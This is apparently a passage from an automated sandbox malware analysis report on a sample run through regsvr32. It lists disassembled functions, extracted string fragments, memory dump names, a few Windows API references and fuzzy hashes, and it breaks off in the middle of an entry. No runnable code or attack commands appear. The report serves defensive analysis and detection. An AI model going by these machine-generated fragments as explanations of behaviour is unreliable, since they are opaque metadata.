Instruction Fuzzy Hash: 4741E2B180078ECFDB48CF68C88A5DE7BF0FB58358F104619E859A6254D3B89695CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 01281B94 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

b, xrefs: 01281C2E
9luJ, xrefs: 01281BF8
=2y}, xrefs: 01281CF9
=2y}, xrefs: 01281CEE

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 9luJ$=2y}$=2y}$b
API String ID: 0-1667874806
Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
Instruction ID: 54de95b14b858e6e245c6534dfe97649e2a2da4ced734e218a764dc321d3503f
Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
Instruction Fuzzy Hash: DA41E6B181038ECFDF44CF64D88A4CE7BB0FB18358F110A19E865A62A0D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 012848FC Relevance: 4.0, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

O,, xrefs: 01284938
;, xrefs: 01284BE0
fdu, xrefs: 01284ACA

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;$O,$fdu
API String ID: 0-1721916326
Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
Instruction ID: e52c047d148f01f0fc7f384073d36c0533d80977397f538bd9ffbab301656126
Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
Instruction Fuzzy Hash: 4CA10371D14718EBDF58EFA8E8C999DBBB1FB54318F00421EE806A72A0DBB49945CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01283E0C Relevance: 3.9, Strings: 3, Instructions: 171COMMON

Download Yara Rule

Strings

u, xrefs: 01283EF1
&v, xrefs: 01283EC8
f, xrefs: 01283E35

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: u$&v$f
API String ID: 0-1868853588
Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
Instruction ID: 3c58a0e5f6feac16014e5cec942ba47b4bc6087e65467201281d8cf4549ee0fa
Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
Instruction Fuzzy Hash: 2B714471D15709ABDF1CDFA8E5C919EBBB1FB48314F10812DE416A72A0CB749945CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0129E750 Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

o, xrefs: 0129E8F8
j, xrefs: 0129E86D
t, xrefs: 0129E908

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: o$j$t
API String ID: 0-2067604139
Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
Instruction ID: 05ad8cae2281c074ff6c4c48836e7f999a8c6f8766c0817d0340576c9484557b
Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
Instruction Fuzzy Hash: 0D61E2705187858BD768DF28C18A56FBBF1FBD6704F104A1DE68A8B2A0D77AD844CB43

Uniqueness

Uniqueness Score: -1.00%

Function 0129D5F0 Relevance: 3.8, Strings: 3, Instructions: 96COMMON

Download Yara Rule

Strings

P, xrefs: 0129D6C4
KGRa, xrefs: 0129D70C
wy, xrefs: 0129D66F

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: P$KGRa$wy
API String ID: 0-4077564265
Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
Instruction ID: ad2794d3d7673c422cd3a5afc210367e4e296701aa53d027cc80d900e858dec2
Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
Instruction Fuzzy Hash: 1141C0B090074A8FDF48DF68C8865DE7FB0FB68348F51461DE84AA6290D37896A4CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 01298BB8 Relevance: 3.8, Strings: 3, Instructions: 96COMMON

Download Yara Rule

Strings

`Y, xrefs: 01298BCF
N@`Y, xrefs: 01298C7D
=, xrefs: 01298D0C

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =$N@`Y$`Y
API String ID: 0-2183226064
Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
Instruction ID: b607d0f8777087aa2904d859d567562c40ed72396abcaa4cfb1f018df518556b
Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
Instruction Fuzzy Hash: 0E51D3B190074E8FDB44DF68C88A4DE7FB0FB68398F204619F856A6250D3B496A4CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 0129EAC0 Relevance: 3.8, Strings: 3, Instructions: 86COMMON

Download Yara Rule

Strings

\, xrefs: 0129EACC
~?, xrefs: 0129EB85
'0, xrefs: 0129EBFD

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: '0$~?$\
API String ID: 0-629757258
Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
Instruction ID: 30dc72af65d5386f8087083d6da3fd3cc072083ef7f2262316468be92a30dec9
Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
Instruction Fuzzy Hash: C441CFB0548B818BE718DF28C59A51ABBF1FBC5344F604A2DF6968A3A0D774D885CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0128DCB8 Relevance: 3.8, Strings: 3, Instructions: 80COMMON

Download Yara Rule

Strings

A7, xrefs: 0128DD24
z, xrefs: 0128DD83
~*b, xrefs: 0128DD03

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: A7$z$~*b
API String ID: 0-275545515
Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
Instruction ID: a6cb114d968872a017bc3ee973ee6f1ccae742eb32f4caa2aec6cc0b7aba56cd
Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
Instruction Fuzzy Hash: AC41C4B180074ECFDB48CF64C48A5DE7FB0FB64398F204619E855A6290D3B896A9CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0128A7F0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON

Download Yara Rule

Strings

rTk=, xrefs: 0128A831
H, xrefs: 0128A8C6
{,%, xrefs: 0128A85C

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: H$rTk=${,%
API String ID: 0-3174111592
Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
Instruction ID: 4af3ccde9e44ba29f8c990b0441f1fdc682cbcf01128c1703a31e5191436c39f
Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
Instruction Fuzzy Hash: 6131F370528785ABD798DF28C48A91EBBE1FBC4354F906A2DF982872A0C779C445CB03

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B878 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 000000018000BAC7
RaiseException.KERNEL32 ref: 000000018000BAD8

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010DB0 Relevance: 3.0, APIs: 2, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

ZwOpenSymbolicLinkObject.NTDLL ref: 0000000180010DBB
ZwOpenSymbolicLinkObject.NTDLL ref: 0000000180010DD3

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: LinkObjectOpenSymbolic
String ID:
API String ID: 3706036087-0
Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704

Uniqueness

Uniqueness Score: -1.00%

Function 01293FD0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

D?", xrefs: 01294246
8zfK, xrefs: 0129451B

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: D?"$8zfK
API String ID: 0-617590365
Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
Instruction ID: 986bb50115d4f2dfbaf752fb7bc20d3c42e42e66a606891763085c74a659f535
Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
Instruction Fuzzy Hash: 7A1202B550660DCBDB68DF38C48A49E3BE0FF58304F205129FC269B2A2D774E965CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0128C078 Relevance: 2.9, Strings: 2, Instructions: 384COMMON

Download Yara Rule

Strings

#X, xrefs: 0128C564
h}, xrefs: 0128C778

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$h}
API String ID: 0-3021649463
Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
Instruction ID: cf185320833ade7f34e4ec46b1d85ce3fd3c8c21789924c57a274e2f3d3c687a
Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
Instruction Fuzzy Hash: 9422A6709193888BEBF8DF24C889AD97BF0FF44704F90651ED84E9A690DB786645CF42

Uniqueness

Uniqueness Score: -1.00%

Function 012A9910 Relevance: 2.8, Strings: 2, Instructions: 322COMMON

Download Yara Rule

Strings

+ <, xrefs: 012A9A2E
#X, xrefs: 012A9941

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$+ <
API String ID: 0-1007305072
Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
Instruction ID: 78589f76859d4b7617680bf6532240f876733c63658941fc4d6c79c4adbd725d
Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
Instruction Fuzzy Hash: 600278B5900709CFDB88CF68C58A5DD7BB9FB59308F404129FC1E9A2A0D3B4E919CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0129B460 Relevance: 2.8, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

aYG, xrefs: 0129B648
Hc, xrefs: 0129B853

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Hc$aYG
API String ID: 0-2147329803
Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
Instruction ID: 87842a1534da386f921486355b539d5d60447f456c3e60b4ce5d0f3f7c31be55
Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
Instruction Fuzzy Hash: 71D1127551170DCBDF58CF28C58A59E3BE5FF58308F504129FC1A862A4D7B8E825CB46

Uniqueness

Uniqueness Score: -1.00%

Function 012833D4 Relevance: 2.8, Strings: 2, Instructions: 276COMMON

Download Yara Rule

Strings

Ip, xrefs: 01283906
2/, xrefs: 01283729

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Ip$2/
API String ID: 0-2558650176
Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
Instruction ID: c55d7049676f54b99be3b7a5664d891fb35371a6e041ea6f3988006d904f926d
Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
Instruction Fuzzy Hash: FBE1D470515B898FEBB8DF28CC89BEF7BA0FB44306F10551AD8499E290DBB49645CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01284214 Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

j-`, xrefs: 0128444F
h, xrefs: 0128432B

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: h$j-`
API String ID: 963392458-2572860821
Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
Instruction ID: 9fbd3c76ce5085fef888da736ad662dae897b628235dafb092c0a3adf0a2573f
Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
Instruction Fuzzy Hash: 7FC1E371904788CFDF6CDFA8C88A59DBBB1FB58308F20421DE916AB661DBB49845CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01296C70 Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

UP, xrefs: 01296CED
#z, xrefs: 01296FB0

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #z$UP
API String ID: 0-3609392360
Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
Instruction ID: 3eaa99dffd874f0424d51832e6bf83acbe13ca86058332b38dbf2c7533f57940
Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
Instruction Fuzzy Hash: 7DA1457191460ACFDF58CFA8E4CA49EBFB0FB64384F204119E816A72A0CB749995CFC1

Uniqueness

Uniqueness Score: -1.00%

Function 012A94BC Relevance: 2.7, Strings: 2, Instructions: 194COMMON

Download Yara Rule

Strings

z~, xrefs: 012A94EB
)bkr, xrefs: 012A95CD

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )bkr$z~
API String ID: 0-4035444816
Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
Instruction ID: 5c0d7a3e05d7614cc8324332500e8fdd8879e71686e9a83a992321c25799cd55
Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
Instruction Fuzzy Hash: 318171715247898FEFB88F28DC867D93BA0FB45318F908119D98DCE291DF785A89CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0129EC30 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

NM, xrefs: 0129EF7F
aK>, xrefs: 0129EF0B

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: aK>$NM
API String ID: 0-1076587397
Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
Instruction ID: 2ea4b4a36d2c2c2fc760a183f677fefc93221cae49c26f998b0b080850576423
Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
Instruction Fuzzy Hash: 41B144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A0E3B5E614CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0129662C Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

GcX, xrefs: 01296734
cy5X, xrefs: 012969F9

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GcX$cy5X
API String ID: 0-3427037236
Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
Instruction ID: 82b67414b69a14e5b573bba855143c86f90f7ef143fb5ca9c2d3f6df82a972ec
Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
Instruction Fuzzy Hash: 63A1D7B0158388CBEBBEDF38C89A6D93BA9FB54704F504619E90E8E290DF745745CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0128AC94 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

U, xrefs: 0128AF25
&, xrefs: 0128AF3E

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &$U
API String ID: 0-326847644
Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
Instruction ID: ff153f8f839339b29235977daa9ec6aac1ef02d792cde77cb7220861ccd75dbe
Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
Instruction Fuzzy Hash: F59169B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01295A00 Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

z5, xrefs: 01295C39
k' {, xrefs: 01295C91

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: k' {$z5
API String ID: 0-3484172565
Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
Instruction ID: 593790a8b7bc2f88e7b697130bb4506c77b1b4d744bbda0c7fa2cd48a8983ef0
Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
Instruction Fuzzy Hash: D871087061074A8FDB48DF28C88A5DE7BA1FB58348F114329ED8AAB250D778D954CBC8

Uniqueness

Uniqueness Score: -1.00%

Function 0128AAB8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

6, xrefs: 0128AAEC
D, xrefs: 0128AC1C

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6$D
API String ID: 0-3309211938
Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
Instruction ID: 39b91e1a6b7d0e39e77fbaadd5e5ebef9bbeed17d70d28014f8c91568e6d7c80
Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
Instruction Fuzzy Hash: 445168705247899BDB98DF2CDC899993BE0FB15308F90622DFD86C7292D778D886CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01287530 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

(Pv0, xrefs: 0128768B
#T, xrefs: 012875B2

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #T$(Pv0
API String ID: 0-2531358951
Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
Instruction ID: 077abaecfc9f597e8b98a1dec292a5b915312320a215876e076192bd5804cb86
Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
Instruction Fuzzy Hash: 0A5140B051034E8BDF58DF18D88A0DE3FA0FB28398F211619ED46A6294D378D995CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 01293B14 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

$, xrefs: 01293BFF
%9, xrefs: 01293BB8

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $$%9
API String ID: 0-3031553271
Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
Instruction ID: 880a133b4396d4c5f72c5991d31332aec34cf0a09cf9b364cd5575cc717f7955
Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
Instruction Fuzzy Hash: 22414E7062CB85ABDB98DF2DC0D562ABAE1FB84714F90592EF586C7390C778C4448B46

Uniqueness

Uniqueness Score: -1.00%

Function 0128B07C Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

gd, xrefs: 0128B208
s=z, xrefs: 0128B235

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: gd$s=z
API String ID: 0-3301279615
Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
Instruction ID: aef8be623e838db2a0e0a0d3fb9d473e6f06ec14727dd453c7c1add23fb2dd3e
Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
Instruction Fuzzy Hash: 2151E2B191034A8FDB48DF68D48A5DE7FB1FB68388F204219F856A6250D37886A4CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 01286138 Relevance: 2.6, Strings: 2, Instructions: 106COMMON

Download Yara Rule

Strings

!oW!, xrefs: 012862B0
ke&Q, xrefs: 012861EC

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !oW!$ke&Q
API String ID: 0-419570616
Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
Instruction ID: 21b5a3af619e610f9572078b30577bbd8fef81ae52cb1464ecb034c0d2b5066b
Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
Instruction Fuzzy Hash: 7851D6B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 01284758 Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

?j|, xrefs: 012847F0
P, xrefs: 01284886

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ?j|$P
API String ID: 0-615948335
Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
Instruction ID: 1c6b53cefd4508231c1f0fb14e489ac89c32a09fe352c7defb047257884b4dad
Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
Instruction Fuzzy Hash: 5F41D3B090034A8FDB48DF64C48A5DE7FB1FB68388F50461DE816A6390D77896A4CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 01295880 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

%, xrefs: 012958E3
aI, xrefs: 012958CF

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %$aI
API String ID: 0-3604358270
Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
